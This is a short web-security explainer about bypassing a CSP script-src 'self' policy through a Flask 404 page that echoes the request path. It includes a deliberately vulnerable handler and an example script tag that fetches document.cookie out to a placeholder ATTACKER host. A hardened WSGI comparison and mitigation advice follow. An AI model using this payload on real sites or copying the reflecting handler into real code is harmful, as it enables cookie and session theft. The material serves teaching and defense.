With:
resp.headers['Content-Security-Policy'] = "script-src 'self'"
And a custom 404 page like:
from flask import Flask, request

app = Flask(__name__)

@app.errorhandler(404)
def page_not_found(error):
    # Echoes the requested path straight back into the 404 response body
    path = request.path
    return f"{path} not found"
It's possible to reflect JS in the same origin: a request for a non-existent path returns a 404 body containing that path, so a `script src` pointing at such a path on the site's own origin satisfies 'self' and the reflected text is executed as JavaScript.
E.g.
<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>
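Added example (not code from the original post): the reflecting 404 handler above next to a hardened one, written as plain WSGI apps with only the standard library so it runs in-process without Flask. The hardened variant removes the reflection (fixed body), labels the body text/plain and adds X-Content-Type-Options: nosniff, so a browser refuses to execute a 404 response fetched via a script tag. The helper names (vulnerable_404, hardened_404, call, reflects_path, blocks_script_use) and the probe path are this example's own assumptions; the CSP string is the page's, properly terminated.

```python
"""Reflecting vs. hardened 404 handlers for the script-src 'self' bypass above (added example)."""
from wsgiref.simple_server import make_server
from wsgiref.util import setup_testing_defaults

CSP = "script-src 'self'"  # the policy from the page, with the string terminated

NON_SCRIPT_SAFE_TYPES = {"text/javascript", "application/javascript", "application/x-javascript"}


def vulnerable_404(environ, start_response):
    """Mirrors the page's page_not_found: the request path is echoed into the body."""
    path = environ.get("PATH_INFO", "/")
    body = f"{path} not found".encode()
    start_response("404 Not Found", [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Security-Policy", CSP),
    ])
    return [body]


def hardened_404(environ, start_response):
    """Fixed body (no user input), text/plain MIME type and nosniff.

    With nosniff the browser blocks a <script src> response whose MIME type is not a
    JavaScript type; dropping the reflection removes the attacker-controlled text entirely.
    """
    body = b"Not found"
    start_response("404 Not Found", [
        ("Content-Type", "text/plain; charset=utf-8"),
        ("X-Content-Type-Options", "nosniff"),
        ("Content-Security-Policy", CSP),
    ])
    return [body]


def call(app, path):
    """Invoke a WSGI app in-process; return (status, headers dict, body str)."""
    environ = {}
    setup_testing_defaults(environ)  # fills in a minimal, well-formed WSGI environ
    environ["PATH_INFO"] = path
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response)).decode()
    return captured["status"], captured["headers"], body


def reflects_path(app, path):
    """Reviewer's check: does the 404 body contain the requested path verbatim?"""
    _, _, body = call(app, path)
    return path in body


def blocks_script_use(app, path):
    """True when the response cannot be consumed as a script: nosniff plus a non-JS MIME type."""
    _, headers, _ = call(app, path)
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    nosniff = headers.get("X-Content-Type-Options", "").strip().lower() == "nosniff"
    return nosniff and ctype not in NON_SCRIPT_SAFE_TYPES


if __name__ == "__main__":
    probe = "/does-not-exist;x=1//"  # constructed path with script-like punctuation, no payload
    for name, app in (("vulnerable", vulnerable_404), ("hardened", hardened_404)):
        print(f"{name}: reflects path={reflects_path(app, probe)}, "
              f"blocks script use={blocks_script_use(app, probe)}")
    # To inspect the hardened response with curl -i localhost:8000/anything, uncomment:
    # make_server("", 8000, hardened_404).serve_forever()
```

The same two measures carry over to the Flask handler on the page: return a constant body from the 404 handler instead of `request.path`, and set `X-Content-Type-Options: nosniff` on every response so no same-origin non-script resource can be loaded as a script.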